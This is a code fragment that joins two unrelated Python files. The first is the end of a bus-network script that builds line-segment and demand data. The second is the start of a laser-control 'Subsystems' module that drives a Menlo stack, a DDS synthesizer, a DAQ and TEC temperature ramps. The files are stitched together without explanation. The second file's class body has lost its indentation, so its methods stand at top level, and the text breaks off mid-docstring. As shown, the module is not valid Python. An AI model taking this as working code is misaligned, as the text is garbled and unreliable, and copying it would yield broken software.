            print("{0}".format(line[s]),file=f,end=" ")
        print("{0}".format(line[-1]),file=f)
        bus_num=bus_num+1
print("**************Chekck all bus stops")
for b in all_bus_stos:
    print(b)
# Step 3 generate leg seg data
# linkdata.txt: whitespace-separated tail/head node ids (0-based in the
# file); t0.txt: one travel cost per link row.
linkid = pd.read_csv("linkdata.txt",header=None,delimiter=r"\s+")
cost =pd.read_csv("t0.txt",header=None)
num_row = linkid.shape[0]
print("num row = {0}".format(num_row))
links = []
for r in range(0,num_row):
    # Shift to 1-based node ids to match the bus-stop numbering.
    tail = linkid[0][r]+1
    head = linkid[1][r]+1
    t = cost[0][r]
    links.append(LinkClass(tail,head,t))
# Echo all links for manual inspection.
for l in links:
    print("{0},{1},{2}".format(l.tail,l.head,l.cost))
print("***************Check Line Seg Data***********")
# For every consecutive pair of non-zero stops on each line, write one
# record: <line id> <segment no.> <cost> <variance> <fare>.
# NOTE(review): b[0] is the prepended line number only for the reversed
# lines appended in Step 2; for forward lines b[0] is the first stop --
# confirm this asymmetry is intended.
with open("LineSegData.txt","w") as f:
    for b in all_bus_stos:
        seg = 1
        for i in range(1,len(b)-1):
            now = b[i]
            next_stop = b[i+1]
            if now!=0 and next_stop!=0:
                print("{0}".format(b[0]),end=" ",file=f)
                # print("Now = {0}, next = {1}".format(now, next_stop))
                # Look up the link matching this stop pair.
                # NOTE(review): x[0] raises IndexError if no link connects
                # the pair -- presumably the bus set guarantees one exists.
                x =[c for c in links if c.tail==now and c.head==next_stop]
                print("{0}".format(seg),end=" ",file=f)
                seg = seg +1
                print("{0}".format(x[0].cost),end=" ",file=f)
                print("0",end=" ",file=f) #variance
                print("1",file=f) # fare value set to be 1
# Flag nodes that are served by at least one bus line, then keep only the
# OD pairs whose endpoints are both served.
# NOTE(review): node ids appear to be 1-based (Step 3 adds 1), so a node
# id of 25 would overflow this 25-element list -- TODO confirm the id
# range.
used_nodes =[False]*25
odf = pd.read_csv("AllOd.txt",header=None,delimiter=r"\s+")
od = []
num_row = odf.shape[0]
for r in range(0, num_row):
    origin = odf[0][r]
    dest = odf[1][r]
    val = odf[2][r]
    print("Origin = {0}, Dest = {1}, Val = {2}".format(origin,dest,val))
    od.append(ODClass(origin,dest,val))
# Mark served nodes (index 0 of each entry is skipped; for reversed lines
# it is the line number).
for b in all_bus_stos:
    for s in range(1,len(b)):
        if b[s]!=0:
            used_nodes[b[s]]=True
for n in range(0,len(used_nodes)):
    if used_nodes[n]:
        print(n)
# Filtered demand: only OD pairs reachable by bus.
new_od = []
for w in od:
    if used_nodes[w.origin] and used_nodes[w.dest]:
        new_od.append(ODClass(w.origin,w.dest,w.demand))
|
<reponame>trimitri/jokarus
"""The Subsystems class manages the connection to internal subsystems.
This is an interface to the actual things connected to each port of each
subsystem.
SAFETY POLICY: This class silently assumes all passed arguments to be of
correct type. The values are allowed to be wrong, though.
"""
import asyncio
from collections import namedtuple
import enum
from functools import partial
import logging
import time
from typing import Dict, List, Tuple, Union
from . import lock_buddy # for type annotations # pylint: disable=unused-import
from .temperature_ramp import TemperatureRamp
from ..drivers import ecdl_mopa, dds9_control, menlo_stack, mccdaq, ms_ntc
from ..util import asyncio_tools as tools
from .. import logger
from .. import constants as cs
LOGGER = logging.getLogger("pyodine.controller.subsystems")  # logging.Logger
LOGGER.setLevel(logging.DEBUG)
# TODO: Drop this and use `TecUnit` below instead.
TEC_CONTROLLERS = {'miob': 1, 'vhbg': 2, 'shgb': 3, 'shga': 4}
# Index of the Menlo PII lockbox card used for the frequency lock.
LOCKBOX_ID = 2
# Serial port the DDS synthesizer is attached to.
DDS_PORT = '/dev/ttyUSB2'
# Define some custom types.
# pylint: disable=invalid-name
MenloUnit = Union[float, int]
# Measurement (time, reading)
DataPoint = Tuple[float, MenloUnit]
Buffer = List[DataPoint]
# pylint: enable=invalid-name
class AuxTemp(enum.IntEnum):
    """How to index the array returned by `get_aux_temps()`?"""
    # Keep this synchronized with `get_aux_temps()`!
    # Each member corresponds (by position) to one NTC channel in the
    # `channels` list built in `get_aux_temps()`.
    CELL = 0
    LD_MO = 1
    LD_PA = 2
    SHG = 3
    MENLO = 4
    AOM_AMP = 5
    HEATSINK_A = 6  # sensor closer to the side
    HEATSINK_B = 7  # sensor closer to the back
class DaqInput:  # pylint: disable=too-few-public-methods
    """The MCC USB1608G-2AO features 16 analog inputs.

    Static constants container. Don't instantiate."""
    # Photodetector and signal inputs.
    DETECTOR_LOG = mccdaq.DaqChannel.C_6
    DETECTOR_PUMP = mccdaq.DaqChannel.C_14
    ERR_SIGNAL = mccdaq.DaqChannel.C_7
    # NTC temperature sensor inputs (see `AuxTemp` for result indexing).
    NTC_AOM_AMP = mccdaq.DaqChannel.C_10
    NTC_CELL = mccdaq.DaqChannel.C_0
    NTC_HEATSINK_A = mccdaq.DaqChannel.C_1  # sensor closer to the side
    NTC_HEATSINK_B = mccdaq.DaqChannel.C_9  # sensor closer to the back
    NTC_MENLO = mccdaq.DaqChannel.C_3
    NTC_MO = mccdaq.DaqChannel.C_12
    NTC_PA = mccdaq.DaqChannel.C_2
    NTC_SHG = mccdaq.DaqChannel.C_8
    # Power monitoring photodiodes.
    PD_AUX = mccdaq.DaqChannel.C_13  # MiLas aux. output (MO basically)
    PD_MIOB = mccdaq.DaqChannel.C_5  # MiLas power tap on MiOB
    RAMP_MONITOR = mccdaq.DaqChannel.C_11
    REF_5V = mccdaq.DaqChannel.C_4
class DdsChannel(enum.IntEnum):
    """The four channels of the DDS device."""
    AOM = 1    # acousto-optic modulator drive
    EOM = 0    # electro-optic modulator drive
    MIXER = 2  # demodulation mixer drive (phase-locked to EOM)
    FREE = 3   # not in use
class LdDriver(enum.IntEnum):
    """Card indices of current drivers used.

    To ensure backwards compatibility, the values equal the "unit numbers" of
    the respective OSC cards. For new code, however, no assumptions about the
    enum values should be made.
    """
    # See `_LD_CARDS` below for the mapping to actual OSC cards.
    MASTER_OSCILLATOR = 1
    POWER_AMPLIFIER = 3
# Named access to the four photodiode readings returned by
# `Subsystems.get_light_levels()`.
LightSensors = namedtuple('LightSensors', 'MIOB AUX PUMP LOG')
# DAQ channel and input gain range per sensor, field-aligned with
# `LightSensors` above.
LIGHT_SENSOR_CHANNELS = LightSensors(DaqInput.PD_MIOB, DaqInput.PD_AUX,
                                     DaqInput.DETECTOR_PUMP, DaqInput.DETECTOR_LOG)
LIGHT_SENSOR_GAINS = LightSensors(mccdaq.InputRange.PM_2V, mccdaq.InputRange.PM_2V,
                                  mccdaq.InputRange.PM_5V, mccdaq.InputRange.PM_5V)
class Tuners:  # pylint: disable=too-few-public-methods
    """The usable tuners exposed by the system.

    This is a static class whose members need to explicitly set from the
    outside, as they are None otherwise.
    """
    MO = None  # type: lock_buddy.Tuner
    """Master oscillator diode current."""
    MIOB = None  # type: lock_buddy.Tuner
    """Temperature of micro-optical bench."""
# Maps the public `LdDriver` units onto the physical Menlo OSC cards.
_LD_CARDS = {
    LdDriver.MASTER_OSCILLATOR: menlo_stack.OscCard.OSC1A,
    LdDriver.POWER_AMPLIFIER: menlo_stack.OscCard.OSC3B
}  # type: Dict[LdDriver, menlo_stack.OscCard]
"""The connection between oscillator supply cards and driven currents."""
class TecUnit(enum.IntEnum):
    """The Menlo stack's TEC controllers."""
    # Values match the legacy `TEC_CONTROLLERS` name->index dict above.
    MIOB = 1
    VHBG = 2
    SHGB = 3
    SHGA = 4
class SubsystemError(RuntimeError):
    """One of the subsystems experienced a critical problem. Reset is advised.
    """
    # The docstring alone is a valid class body; the former `pass` statement
    # was redundant.
class Subsystems:
"""Provides a wrapper for all connected subsystems.
The instance will provide access to the Laser at .laser .
"""
def __init__(self) -> None:
    """Set up the (asynchronous) connections to all hardware subsystems.

    Returns immediately; the actual links to Menlo stack, DDS and DAQ are
    established later by pollers running on the event loop.
    """
    # Wait for Menlo to show up and initialize laser control as soon as
    # they arrive.
    self._menlo = None  # type: menlo_stack.MenloStack
    self.laser = None  # type: ecdl_mopa.EcdlMopa
    self._loop = asyncio.get_event_loop()  # type: asyncio.AbstractEventLoop
    """The event loop all our tasks will run in."""
    # Poll until the Menlo stack is up; then _init_laser() builds the
    # laser wrapper on top of it.
    asyncio.ensure_future(
        tools.poll_resource(
            lambda: bool(self._menlo), 5, self.reset_menlo,
            self._init_laser, name="Menlo"))
    # Initialize the DDS connection and monitor it for connection problems.
    # We keep the poller alive to monitor the RS232 connection which got
    # stuck sometimes during testing.
    self._dds = None  # type: dds9_control.Dds9Control
    dds_poller = tools.poll_resource(
        self.dds_alive, 15, self.reset_dds, continuous=True, name="DDS")
    self._dds_poller = self._loop.create_task(dds_poller)  # type: asyncio.Task
    # The DAQ connection will be established and monitored through polling.
    self._daq = None  # type: mccdaq.MccDaq
    asyncio.ensure_future(tools.poll_resource(
        self.daq_alive, 3.7, self.reset_daq, name="DAQ"))
    # One software temperature ramp per TEC unit.
    self._temp_ramps = dict()  # type: Dict[int, TemperatureRamp]
    self._init_temp_ramps()
    LOGGER.info("Initialized Subsystems.")
def has_menlo(self) -> bool:
    """True as soon as the Menlo stack connection has been established."""
    return bool(self._menlo)
def daq_alive(self) -> bool:
    """The DAQ is connected and healthy."""
    LOGGER.debug("Checking DAQ health.")
    # A missing connection (None) and a failed ping both count as dead.
    return bool(self._daq and self._daq.ping())
def dds_alive(self) -> bool:
    """The DDS is connected and healthy."""
    # A missing connection (None) and a failed ping both count as dead.
    return bool(self._dds and self._dds.ping())
async def fetch_scan(self, amplitude: float = 1) -> cs.SpecScan:
    """Scan the frequency once and return the readings acquired.

    This is the main method used by the `lock_buddy` module to perform
    prelock.

    :param amplitude: The peak-to-peak amplitude to use for scanning,
                ranging [0, 1]. 1 corresponds to
                `constants.DAQ_MAX_SCAN_AMPLITUDE`.
    :returns: Numpy array of fetched data. There are three columns: "ramp
                monitor", "error signal" and "logarithmic port".
    :raises ConnectionError: DAQ is unavailable.
    """
    # Inner def instead of an assigned lambda (PEP 8 E731); the DAQ call
    # blocks, so it is dispatched to the default thread pool below.
    def blocking_fetch():
        return self._daq.fetch_scan(
            amplitude * cs.DAQ_MAX_SCAN_AMPLITUDE,
            cs.DAQ_SCAN_TIME,
            [(DaqInput.RAMP_MONITOR, mccdaq.InputRange.PM_10V),
             (DaqInput.ERR_SIGNAL, mccdaq.InputRange.PM_1V),
             (DaqInput.DETECTOR_LOG, mccdaq.InputRange.PM_5V)],
            mccdaq.RampShape.DESCENT)
    try:
        return await asyncio.get_event_loop().run_in_executor(None, blocking_fetch)
    except (AttributeError, ConnectionError) as err:
        # AttributeError: self._daq is still None.
        raise ConnectionError(
            "Couldn't fetch signal as DAQ is unavailable.") from err
@tools.static_variable('cache', {'time': 0, 'value': None})
async def get_aux_temps(self, dont_log: bool = False, dont_cache: bool = False) -> List[float]:
    """Read temperatures of auxiliary sensors, as indexed by AuxTemp.

    This is cached, as it will be inquired very frequently by the runlevel
    mechanisms and would load up the DAQ otherwise.

    :param dont_log: Skip writing the readings to the quantity logger.
    :param dont_cache: Force a fresh measurement even if a recent cached
        result exists.
    :raises ConnectionError: Couldn't convince the DAQ to send us data.
    """
    if not self._daq:
        raise ConnectionError("DAQ not initialized.")
    cache = self.get_aux_temps.cache  # see decorator # pylint: disable=no-member
    # Serve from cache while it is younger than TEMP_CACHE_LIFETIME.
    if time.time() - cache['time'] < cs.TEMP_CACHE_LIFETIME and not dont_cache:
        LOGGER.debug("Returning cached temperatures")
        return cache['value']
    LOGGER.debug("Actually measuring temperatures.")
    # Keep this synchronized with `AuxTemp`!
    channels = [(DaqInput.NTC_CELL, mccdaq.InputRange.PM_5V),
                (DaqInput.NTC_MO, mccdaq.InputRange.PM_5V),
                (DaqInput.NTC_PA, mccdaq.InputRange.PM_5V),
                (DaqInput.NTC_SHG, mccdaq.InputRange.PM_5V),
                (DaqInput.NTC_MENLO, mccdaq.InputRange.PM_5V),
                (DaqInput.NTC_AOM_AMP, mccdaq.InputRange.PM_5V),
                (DaqInput.NTC_HEATSINK_A, mccdaq.InputRange.PM_5V),
                (DaqInput.NTC_HEATSINK_B, mccdaq.InputRange.PM_5V)]
    def fetch_readings() -> List[int]:
        # Blocking DAQ access, run in the default thread pool below.
        return self._daq.sample_channels(channels).tolist()[0]  # may raise!
    temps = ms_ntc.to_temperatures(
        await asyncio.get_event_loop().run_in_executor(None, fetch_readings))
    if not dont_log:
        logger.log_quantity('daq_temps', '\t'.join([str(t) for t in temps]))
    # Refresh the cache with the new measurement.
    cache['value'] = temps
    cache['time'] = time.time()
    return temps
async def get_full_set_of_readings(self, since: float = None) -> Dict[str, Union[Buffer, Dict]]:
    """Return a dict of all readings, ready to be sent to the client.

    :param since: Only return readings newer than this time stamp
        (presumably UNIX time, as used by the Menlo buffers -- confirm);
        None returns everything available.
    :returns: Empty dict while the Menlo stack is not connected.
    """
    data = {}  # type: Dict[str, Union[Buffer, Dict]]
    if self._menlo is None:
        return data
    # ADC readings
    for channel in range(8):
        data['adc' + str(channel)] = self._menlo.get_adc_voltage(channel,
                                                                 since)
    # LD current drivers
    for name, unit in [('mo', LdDriver.MASTER_OSCILLATOR),
                       ('pa', LdDriver.POWER_AMPLIFIER)]:
        data[name + '_enabled'] = self._menlo.is_current_driver_enabled(unit)
        data[name + '_current'] = self._menlo.get_diode_current(_LD_CARDS[unit], since)
        data[name + '_current_set'] = self._menlo.get_diode_current_setpoint(_LD_CARDS[unit])
    # TEC controllers
    for name, unit2 in TEC_CONTROLLERS.items():  # unit != unit2 (typing)
        unt = TecUnit(unit2)
        data[name + '_tec_enabled'] = self._menlo.is_tec_enabled(unt)
        data[name + '_temp'] = self._menlo.get_temperature(unt, since)
        data[name + '_temp_raw_set'] = self._menlo.get_temp_setpoint(unt)
        # The software ramp target, wrapped to look like a buffer reading.
        data[name + '_temp_set'] = self._wrap_into_buffer(
            self._temp_ramps[unt].target_temperature)
        data[name + '_temp_ok'] = self._menlo.is_temp_ok(unt)
        data[name + '_tec_current'] = self._menlo.get_tec_current(unt, since)
    # PII Controller
    data['nu_lock_enabled'] = self._menlo.is_lock_enabled(LOCKBOX_ID)
    data['nu_i1_enabled'] = \
        self._menlo.is_integrator_enabled(LOCKBOX_ID, 1)
    data['nu_i2_enabled'] = \
        self._menlo.is_integrator_enabled(LOCKBOX_ID, 2)
    data['nu_ramp_enabled'] = self._menlo.is_ramp_enabled(LOCKBOX_ID)
    data['nu_prop'] = self._menlo.get_error_scale(LOCKBOX_ID)
    data['nu_offset'] = self._menlo.get_error_offset(LOCKBOX_ID)
    data['nu_p_monitor'] = self._menlo.get_pii_monitor(
        LOCKBOX_ID, p_only=True, since=since)
    data['nu_monitor'] = self._menlo.get_pii_monitor(LOCKBOX_ID,
                                                     since=since)
    return data
def get_ld_current_setpt(self, unit: LdDriver) -> float:
    """Return the latest laser diode current in milliamperes.

    :param unit: The LD driver unit to act on. Either an `LdDriver` enum
                member or a plain int may be given.
    :raises ValueError: Given unit is not a `LdDriver`
    :raises ConnectionError: Requested data couldn't be acquired, probably
                because Menlo is not available (yet).
    """
    try:
        setpoint = self._menlo.get_diode_current_setpoint(_LD_CARDS[unit])
        return self._unwrap_buffer(setpoint)
    except (ValueError, AttributeError) as err:
        # AttributeError: self._menlo is still None.
        raise ConnectionError("Couldn't fetch diode current from Menlo.") from err
async def get_light_levels(self) -> LightSensors:
    """Read levels of auxiliary photodiodes.

    :raises ConnectionError: Couldn't convince the DAQ to send us data.
    """
    # Pair each sensor's DAQ channel with its configured input gain.
    channels = []
    for key in LightSensors._fields:
        channels.append((getattr(LIGHT_SENSOR_CHANNELS, key),
                         getattr(LIGHT_SENSOR_GAINS, key)))
    def fetch_readings() -> List[int]:
        return self._daq.sample_channels(channels).tolist()[0]  # may raise!
    raw = await self._loop.run_in_executor(None, fetch_readings)
    # Map raw ADC counts onto the [-1, 1) interval.
    levels = [count / 2**15 - 1 for count in raw]
    logger.log_quantity('light_levels', '\t'.join(str(l) for l in levels))
    return LightSensors._make(levels)
def get_lockbox_level(self) -> float:
    """The current lockbox control output level.

    :raises ConnectionError: Couldn't get a value from Menlo.
    """
    try:
        monitor = self._menlo.get_pii_monitor(LOCKBOX_ID)
        return self._unwrap_buffer(monitor)
    except AttributeError as err:
        # AttributeError because self._menlo is None.
        raise ConnectionError("Couldn't get lockbox level from Menlo.") from err
def get_ramp_offset(self) -> float:
    """The zero position of the ramp used to acquire the error signal"""
    # Simply forwarded from the DAQ driver.
    return self._daq.ramp_offset
def set_ramp_offset(self, volts: float) -> None:
    """The zero position of the ramp used to acquire the error signal

    :param volts: Offset in volts, must be in [-5, 5]
    """
    try:
        # The DAQ driver's property setter validates the range itself.
        self._daq.ramp_offset = volts
    except ValueError:
        LOGGER.error("Couldn't set ramp offset.")
        LOGGER.debug("Reason:", exc_info=True)
def get_setup_parameters(self) -> Dict[str, Buffer]:
    """Return a dict of all setup parameters.

    These are the ones that don't usually change.

    :returns: Empty dict if the DDS couldn't be queried.
    """
    data = {}  # type: Dict[str, Buffer]
    try:
        freqs = self._dds.frequencies
        amplitudes = self._dds.amplitudes
        phases = self._dds.phases
        ext_clock = self._dds.runs_on_ext_clock_source
    except (ConnectionError, AttributeError):
        # AttributeError: self._dds is None (not connected yet).
        LOGGER.warning("Couldn't get setup parameters as DDS is offline")
        return data
    data['eom_freq'] = self._wrap_into_buffer(freqs[DdsChannel.EOM])
    data['aom_freq'] = self._wrap_into_buffer(freqs[DdsChannel.AOM])
    data['aom_amplitude'] = self._wrap_into_buffer(amplitudes[DdsChannel.AOM])
    data['eom_amplitude'] = self._wrap_into_buffer(amplitudes[DdsChannel.EOM])
    data['mixer_amplitude'] = self._wrap_into_buffer(amplitudes[DdsChannel.MIXER])
    data['mixer_phase'] = self._wrap_into_buffer(phases[DdsChannel.MIXER])
    if isinstance(ext_clock, bool):  # May be unknown (None).
        data['rf_use_external_clock'] = self._wrap_into_buffer(ext_clock)
    return data
def get_temp(self, unit: TecUnit) -> float:
    """Returns the temperature of the given unit in °C.

    Consider using this module's provided Enums for choice of unit number.

    :param unit: Unique identifier of the temperature to be fetched.
        Possible values are in `.TecUnit`, (TODO to be continued...).
    :raises ConnectionError: Couldn't get the requested temperature from
        from the concerned subsystem.
    :raises ValueError: There is no temperature with the ID `unit`.
    """
    # The structure right now is more complicated than it would need to be
    # (see get_temp_setpt() for comparison), but we prepared this for
    # fetching all kinds of temperatures from around the system, not only
    # Menlo TEC units.
    try:
        tec_enum = TecUnit(unit)
    except ValueError:
        # Not a TEC unit; fall through to the final ValueError below.
        pass
    else:
        try:
            return self._unwrap_buffer(self._menlo.get_temperature(tec_enum))
        except (ValueError, AttributeError) as err:
            # AttributeError: self._menlo is None; ValueError: no data yet.
            raise ConnectionError("Couldn't fetch temp from Menlo.") from err
    raise ValueError("Unknown unit number {}.".format(unit))
def get_temp_setpt(self, unit: TecUnit) -> float:
    """Returns the temperature setpoint of the given unit in °C.

    :param unit: The TEC unit to fetch from. See provided enum TecUnit for
                available units.
    :raises ConnectionError: Couldn't reach the concerned subsystem.
    :raises ValueError: The provided unit is not a TecUnit.
    """
    try:
        tec = TecUnit(unit)
        return self._unwrap_buffer(self._menlo.get_temp_setpoint(tec))
    except (AttributeError, ValueError) as err:
        raise ConnectionError("Couldn't fetch temp. setpt. from Menlo.") from err
def get_temp_ramp_target(self, unit: TecUnit) -> float:
    """Target temperature the given unit's software ramp steers towards."""
    ramp = self._temp_ramps[unit]
    return ramp.target_temperature
def is_temp_ramp_enabled(self, unit: TecUnit) -> bool:
    """Is the given TEC unit's temp. ramp currently enabled?"""
    ramp = self._temp_ramps[unit]
    return ramp.is_running
def is_ld_enabled(self, unit: LdDriver) -> bool:
    """Is the given laser diode's current driver switched on?"""
    card = _LD_CARDS[unit]
    return self._unwrap_buffer(self._menlo.is_current_driver_enabled(card)) == 1
def is_lockbox_ramp_enabled(self) -> bool:
    """Is the lockbox's built-in ramp generator switched on?"""
    ramp_state = self._menlo.is_ramp_enabled(LOCKBOX_ID)
    return self._unwrap_buffer(ramp_state) == 1
def is_tec_enabled(self, unit: TecUnit) -> bool:
    """Is ``unit``'s TEC controller currently running?

    :raises ConnectionError: No values have been received (yet).
    """
    self._ensure_menlo()  # raises ConnectionError
    try:
        return self._unwrap_buffer(self._menlo.is_tec_enabled(unit)) == 1
    except ValueError as err:
        # Chain the cause (was missing `from err`) so the original
        # traceback survives for debugging.
        raise ConnectionError("Didn't receive data from Menlo.") from err
def lockbox_integrators_disabled(self) -> bool:
    """Are all lockbox integrators disengaged?"""
    # Query both stages (keeps the original call order and count).
    first = int(self._unwrap_buffer(
        self._menlo.is_integrator_enabled(LOCKBOX_ID, 1))) == 1
    second = int(self._unwrap_buffer(
        self._menlo.is_integrator_enabled(LOCKBOX_ID, 2))) == 1
    return not (first or second)
def lockbox_integrators_enabled(self) -> bool:
    """Are all lockbox integrators engaged?"""
    # Query both stages (keeps the original call order and count).
    first = int(self._unwrap_buffer(
        self._menlo.is_integrator_enabled(LOCKBOX_ID, 1))) == 1
    second = int(self._unwrap_buffer(
        self._menlo.is_integrator_enabled(LOCKBOX_ID, 2))) == 1
    return first and second
def nu_locked(self) -> bool:
    """Is the frequency lock engaged?

    :raises ConnectionError: Menlo couldn't be reached.
    """
    try:
        state = self._menlo.is_lock_enabled(LOCKBOX_ID)
        return self._unwrap_buffer(state) == 1
    except (AttributeError, ValueError) as err:  # Menlo is not available.
        raise ConnectionError(
            "Can't inquire nu lock state, as Menlo is unavailable.") from err
async def refresh_status(self) -> None:
    """Ask the Menlo stack for a full state update, if it is connected."""
    if self._menlo is None:
        return
    await self._menlo.request_full_status()
def reset_daq(self) -> None:
    """Reset the USB connection to the DAQ. Does not clear internal state.
    """
    # For lack of better understanding of the object destruction mechanism,
    # we del here before we set it to None.
    del self._daq
    self._daq = None
    try:
        attempt = mccdaq.MccDaq(lock_timeout=cs.DAQ_ALLOWABLE_BLOCKING_TIME)
    except ConnectionError:
        # Leave self._daq at None; the poller set up in __init__ retries.
        LOGGER.error("Couldn't reset DAQ, as the connection failed.")
        LOGGER.debug("Reason:", exc_info=True)
    else:
        LOGGER.info("Successfully (re-)set DAQ.")
        self._daq = attempt
async def reset_dds(self) -> None:
    """Reset the connection to the DDS subsystem.

    (The docstring used to say "Menlo subsystem" -- a copy-paste error.)

    This will not raise anything on failure. Use dds_alive() to check
    success.
    """
    # For lack of better understanding of the object destruction mechanism,
    # we del here before we set it to None.
    del self._dds
    self._dds = None
    try:
        # The DDS class is written in synchronous style although it
        # contains lots of blocking calls. Initialization is the heaviest
        # of them all and is thus run in a thread pool executor.
        attempt = await self._loop.run_in_executor(
            None, partial(dds9_control.Dds9Control, DDS_PORT))
    except ConnectionError:
        LOGGER.error("Couldn't connect to DDS.")
        # Log the traceback at debug level, matching the "Reason:" pattern
        # used by reset_daq() and reset_menlo() (the message was duplicated
        # before).
        LOGGER.debug("Reason:", exc_info=True)
    else:
        LOGGER.info("Successfully (re-)set DDS.")
        self._dds = attempt
async def reset_menlo(self) -> None:
    """Reset the connection to the Menlo subsystem."""
    # For lack of better understanding of the object destruction mechanism,
    # we del here before we set it to None.
    del self._menlo
    self._menlo = None
    # NOTE(review): unlike reset_daq()/reset_dds(), the constructor runs
    # outside the try block, so a ConnectionError raised in it would
    # propagate to the caller -- confirm whether that is intended.
    attempt = menlo_stack.MenloStack()
    try:
        await attempt.init_async()
    except ConnectionError:
        LOGGER.error("Couldn't connect to menlo stack.")
        LOGGER.debug("Reason:", exc_info=True)
    else:
        LOGGER.info("Successfully reset Menlo stack.")
        self._menlo = attempt
def set_aom_amplitude(self, amplitude: float) -> None:
    """Set the acousto-optic modulator driver amplitude betw. 0 and 1."""
    # NOTE: only non-negativity is validated; values > 1 pass through.
    valid = isinstance(amplitude, (float, int)) and amplitude >= 0
    if not valid:
        LOGGER.error("Provide valid amplitude for AOM.")
        return
    try:
        self._dds.set_amplitude(amplitude, int(DdsChannel.AOM))
    except (AttributeError, ConnectionError):
        LOGGER.error("DDS offline.")
        return
    LOGGER.info("Set AOM amplitude to %s %%.", amplitude * 100)
def set_aom_frequency(self, freq: float) -> None:
    """Set the acousto-optic modulator driver frequency in MHz."""
    if not isinstance(freq, (float, int)) or not freq > 0:
        LOGGER.error("Provide valid frequency (float) for AOM.")
        return
    try:
        self._dds.set_frequency(freq, int(DdsChannel.AOM))
    except (AttributeError, ConnectionError):
        # AttributeError: self._dds is None (not connected yet).
        LOGGER.error("DDS offline.")
    else:
        # "Set ..." (past tense) for consistency with every other setter's
        # success message (was "Setting ...").
        LOGGER.info("Set AOM frequency to %s MHz.", freq)
def set_current(self, unit: LdDriver, milliamps: float) -> None:
    """Set diode current setpoint of given unit.

    :raises SubsystemError: Something went wrong in calling a callback.
    """
    try:
        if unit == LdDriver.MASTER_OSCILLATOR:
            self.laser.set_mo_current(milliamps)
        elif unit == LdDriver.POWER_AMPLIFIER:
            self.laser.set_pa_current(milliamps)
        else:
            LOGGER.error("No such laser diode.")
            return  # BUGFIX: don't log success for an unknown unit.
    except ValueError:
        LOGGER.error("Failed to set laser current.")
        LOGGER.debug("Reason:", exc_info=True)
        return  # BUGFIX: don't log success after a failure.
    except ecdl_mopa.CallbackError as err:
        raise SubsystemError("Critical error in osc. sup. unit!") from err
    # Only reached when the current was actually set.
    LOGGER.info("Set diode current of unit %s to %s mA", unit, milliamps)
def set_eom_amplitude(self, amplitude: float) -> None:
    """Set the electro-optic modulator driver amplitude betw. 0 and 1."""
    # NOTE: only non-negativity is validated; values > 1 pass through.
    valid = isinstance(amplitude, (float, int)) and amplitude >= 0
    if not valid:
        LOGGER.error("Provide valid amplitude for EOM.")
        return
    try:
        self._dds.set_amplitude(amplitude, int(DdsChannel.EOM))
    except (AttributeError, ConnectionError):
        LOGGER.error("DDS offline.")
        return
    LOGGER.info("Set EOM amplitude to %s %%.", amplitude * 100)
def set_eom_frequency(self, freq: float) -> None:
    """Set the EOM and mixer frequency in MHz."""
    if not (isinstance(freq, (float, int)) and freq > 0):
        LOGGER.error("Provide valid frequency (float) for EOM.")
        return
    try:
        self._dds.set_frequency(freq, int(DdsChannel.EOM))
    except (AttributeError, ConnectionError):
        LOGGER.error("DDS offline.")
        return
    LOGGER.info("Set EOM frequency to %s MHz.", freq)
def set_error_offset(self, millivolts: float) -> None:
    """Offset to be added to error signal before feeding into lockbox."""
    try:
        value = float(millivolts)
    except (TypeError, ValueError):
        LOGGER.error("Please give a number for error signal offset.")
        LOGGER.debug("Reason:", exc_info=True)
        return
    self._menlo.set_error_offset(LOCKBOX_ID, value)
def set_error_scale(self, factor: float) -> None:
    """Set the scaling factor for error signal input to lockbox."""
    try:
        scale = float(factor)
    except (TypeError, ValueError):
        LOGGER.error("Please give a number for scaling factor.")
        LOGGER.debug("Reason:", exc_info=True)
        return
    self._menlo.set_error_scale(LOCKBOX_ID, scale)
def set_mixer_amplitude(self, amplitude: float) -> None:
    """Set the mixer driver amplitude betw. 0 and 1."""
    # NOTE: only non-negativity is validated; values > 1 pass through.
    valid = isinstance(amplitude, (float, int)) and amplitude >= 0
    if not valid:
        LOGGER.error("Provide valid amplitude for mixer.")
        return
    try:
        self._dds.set_amplitude(amplitude, int(DdsChannel.MIXER))
    except (AttributeError, ConnectionError):
        LOGGER.error("DDS offline.")
        return
    LOGGER.info("Set mixer amplitude to %s %%.", amplitude * 100)
def set_mixer_frequency(self, freq: float) -> None:
    """Set the Mixer frequency in MHz. Will usually be identical to EOM."""
    if not (isinstance(freq, (float, int)) and freq > 0):
        LOGGER.error("Provide valid frequency (float) for Mixer.")
        return
    try:
        self._dds.set_frequency(freq, int(DdsChannel.MIXER))
    except (AttributeError, ConnectionError):
        LOGGER.error("DDS offline.")
        return
    LOGGER.info("Set mixer frequency to %s MHz.", freq)
def set_mixer_phase(self, degrees: float) -> None:
    """Set the phase offset between EOM and mixer drivers in degrees."""
    if not isinstance(degrees, (float, int)):
        LOGGER.error("Provide a mixer phase in degrees (%s given).", degrees)
        return
    try:
        # Only the difference matters, so pin the EOM channel to zero and
        # put the full offset onto the mixer channel.
        self._dds.set_phase(0, int(DdsChannel.EOM))
        self._dds.set_phase(degrees, int(DdsChannel.MIXER))
    except (AttributeError, ConnectionError):
        LOGGER.error("Can't set phase as DDS is offline")
        return
    LOGGER.debug("Set mixer phase to %s°", degrees)
def set_temp(self, unit: TecUnit, celsius: float, bypass_ramp: bool = False) -> None:
    """Set the target temp. for the temperature ramp."""
    try:
        temp = float(celsius)
    except (TypeError, ArithmeticError, ValueError):
        LOGGER.error("Couldn't convert temp setting %s to float.", celsius)
        return
    try:
        tec = TecUnit(unit)
    except (ValueError, TypeError):
        LOGGER.error("Invalid unit: %s.", unit)
        LOGGER.debug("Reason:", exc_info=True)
        return
    if bypass_ramp:
        # Write the setpoint straight to the TEC controller.
        LOGGER.debug("Setting TEC temp. of unit %s to %s°C directly.",
                     tec, temp)
        self._menlo.set_temp(tec, temp)
    else:
        # Let the software ramp approach the new target gradually.
        LOGGER.debug("Setting ramp target temp. of unit %s to %s°C",
                     tec, temp)
        self._temp_ramps[tec].target_temperature = temp
def switch_rf_clock_source(self, which: str) -> None:
    """Pass "external" or "internal" to switch RF clock source."""
    if which not in ('external', 'internal'):
        LOGGER.error('Can only switch to "external" or "internal" '
                     'reference, "%s" given.', which)
        return
    try:
        if which == 'external':
            self._dds.switch_to_ext_reference()
        else:
            self._dds.switch_to_int_reference()
    except (AttributeError, ConnectionError):
        LOGGER.error("DDS offline.")
        return
    LOGGER.info("Switched to %s clock reference.", which)
def switch_integrator(
        self, stage: int, switch_on: bool) -> None:
    """Switch the given PII integrator stage (1 or 2) on or off.

    :param stage: Which stage to act on--1 (fast) or 2 (slow)
